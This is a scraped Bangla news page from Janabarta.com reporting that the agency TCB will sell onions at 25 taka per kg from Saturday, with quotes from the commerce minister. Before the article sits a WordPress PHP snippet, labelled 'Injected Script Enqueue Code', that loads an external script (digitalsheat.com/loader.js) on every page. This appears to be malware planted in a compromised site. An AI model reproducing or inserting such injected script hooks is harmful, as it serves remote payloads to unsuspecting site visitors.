// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site শনিবার থেকে ২৫ টাকা কেজিতে পেঁয়াজ বিক্রি করবে টিসিবি - Janabarta.com

শনিবার থেকে ২৫ টাকা কেজিতে পেঁয়াজ বিক্রি করবে টিসিবি

জনবার্তা ডেস্কঃ সাধারণ মানুষের জন্য তুলনামূলক কম দামে পণ্য বিক্রি করা সরকারি বিপণন সংস্থা-টিসিবি আগামী শনিবার থেকে ২৫ টাকা কেজিতে পেঁয়াজ বিক্রি করবে।

বৃহস্পতিবার সচিবালয়ে এক প্রেস ব্রিফিংয়ে বাণিজ্যমন্ত্রী টিপু মুন্সী বলেন, ‘রমজানে পেঁয়াজের দাম একটু বৃদ্ধি পাওয়ায় শনিবার থেকে সারাদেশে ২৫ টাকা কেজি দরে পেয়াঁজ বিক্রি করবে টিসিবি।’

মন্ত্রী আরো বলেন, ‘করোনা পরিস্থিতিতে দেশের ৫০০টি স্থানে ট্রাকে ও ডিলারদের মাধ্যমে পণ্য বিক্রি করা হচ্ছে। পণ্য বিক্রিতে যাতে কোথাও অনিয়ম না হয়, সেজন্য আমরা মনিটরিং ব্যবস্থা জোরদার করেছি।’

সূত্র : ইউএনবি